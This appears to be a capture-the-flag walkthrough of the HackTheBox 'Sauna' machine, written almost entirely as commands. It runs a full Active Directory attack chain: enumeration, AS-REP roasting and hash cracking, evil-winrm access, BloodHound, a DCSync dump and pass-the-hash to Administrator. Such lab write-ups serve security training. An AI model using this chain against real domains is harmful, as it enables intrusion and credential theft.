Sauna
Hola, esta es la máquina sauna! Let’s hack!
RECON
ping -c 1 <IP>
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn <IP> -oG ports
extractports <ports>
nmap -sCV <PORTS> -oG services
AD DOMAIN DETECTION
crackmapexec smb <IP>
sudo su
nvim /etc/hosts
<IP> <DOMAIN>
SMB ENUM
smbclient -L <IP> -N
crackmapexec smb <IP> --shares
smbmap -H <IP>
smbmap -H <IP> -u 'null'
RCPCLIENT ENUM
rpcclient -U '' <IP> -N
LDAPSEARCH ENUM
ldapsearch -x -h <IP> -s base namingcontext
ldapsearch -x -h <IP> -b 'DC=EGOTISTICAL-BANK,DC=LOCAL'
ldapsearch -x -h <IP> -b 'DC=EGOTISTICAL-BANK,DC=LOCAL' | grep 'dn: CN='
USERS DICTIONARY
nvim users.txt
hsmith
hugo.smith
hugosmith
hugos
KERBRUTE INSTALL
git clone http://github.com/ropnop/kerbrute
cd kerbrute
go build .
go build -ldflags '-s -w' .
upx kerbrute
mv kerbrute /opt/kerbrute
nvim ~/.zshrc
#AL FINAL DE LA LINEA DE <PATH>
:/opt/kerbrute
TGT KERBRUTE ENUM
kerbrute userenum -d EGOTISTICAL-BANK.LOCAL --dc <IP> users.txt
TGT GETNPUSERS ENUM
impacket-GetNPUsers EGOTISTICAL-BANK.LOCAL/ -no-pass -usersfile users.txt
USERS DICTIONARY (WEB ENUM)
nvim users.txt
hsmith
fsmith
hbear
scoins
btaylor
sdriver
skerb
TGT KERBRUTE ENUM (NEW USERS.TXT)
kerbrute userenum -d EGOTISTICAL-BANK.LOCAL --dc <IP> users.txt
TGT GETNPUSERS ENUM (NEW USERS.TXT)
impacket-GetNPUsers EGOTISTICAL-BANK.LOCAL/ -no-pass -usersfile users.txt
CRACKING KERBEROS HASH
hashcat --example-hashes | grep krb5asrep -B 10
hashcat -m 18200 -a 0 hash /usr/share/wordlists/rockyou.txt
GRANTED ACCESS FSMITH USER
crackmapexec smb <IP> -u 'fsmith' -p '<PASSWORD>'
crackmapexec winrm <IP> -u 'fsmith' -p '<PASSWORD>'
evil-winrm -i <IP> -u 'fsmith' -p '<PASSWORD>'
whoami
FLAG USER.TXT
type C:\Users\FSmith\Desktop\user.txt
AD LOCAL ENUM
whoami /priv
whoami /all
net localgroup "Remote Management Users"
net user
AD WINPEAS ENUM
# MÁQUINA ATACANTE
wget https://github.com/carlospolop/PEASS-ng/releases/download/20220717/winPEASx64.exe
mv ~/Downloads/winPEASx64.exe winPEAS.exe
# MÁQUINA VÍCTIMA
cd C:\Windows\Temp
mkdir recon
cd recon
upload ~/Desktop/bast1ant1c/HTB/Sauna/exploit/winPEAS.exe
.\winPEAS.exe
RCPCLIENT ENUM (WITH CREDS)
rpcclient -U 'fsmith%<PASSWORD>' <IP> -c enumdomusers
rpcclient -U 'fsmith%<PASSWORD>' <IP> -c enumdomgroups
rpcclient -U 'fsmith%<PASSWORD>' <IP> -c queryfroupmem 0x200
rpcclient -U 'fsmith%<PASSWORD>' <IP> -c queryuser 0x1f4
rpcclient -U 'fsmith%<PASSWORD>' <IP> -c querydispinfo
GRANTED ACCESS SVC_LOANMGR USER
crackmapexec smb <IP> -u 'svc_loanmgr' -p '<PASSWORD>'
crackmapexec winrm <IP> -u 'svc_loanmgr' -p '<PASSWORD>'
evil-winrm -i <IP> -u 'svc_loanmgr' -p '<PASSWORD>'
whoami
BLOODHOUND INSTALL
apt install neo4j bloodhound
update-alternatives --config java
# SELECCIONAR JAVA-11
BLOODHOUND ENUM
# MÁQUINA ATACANTE
wget https://raw.githubusercontent.com/puckiestyle/powershell/master/SharpHound.ps1
# MÁQUINA VÍCTIMA
cd C:\Windows\Temp
mkdir privs
cd privs
upload ~/Desktop/bast1ant1c/HTB/Sauna/content/SharpHound.ps1
Invoke-BloodHound -CollectionMethod All
download C:\Windows\Temp\privs\20220718205025_BloodHound.zip bloodhound.zip
# BLOODHOUND
neo4j console &>/dev/null & disown
bloodhound &>/dev/null & disown
# INGRESAR CREDENCIALES DE ACCESO
# SEGUIR SECUENCIA EN BLOODHOUND
> Upload Data > bloodhound.zip > Analysis > Find all domain admins
> Find shortest paths to domain admins > Domain
# MARCAR USUARIOS PWNED
Buscar user > mark user as owned
# ESCALAMIENTO
Node info > Outbound control rights > First degree object control
DCSYNC ATTACK
impacket-secretsdump EGOTISTICAL-BANK.LOCAL/svc_loanmgr@<IP>
GRANTING ACCESS ADMINISTRATOR USER (PASS THE HASH)
impacket-psexec EGOTISTICAL-BANK.LOCAL/Administrator@<IP> cmd.exe -hashes <HASH_NT>
whoami
FLAG ROOT.TXT
type C:\Users\Administrator\Desktop\root.txt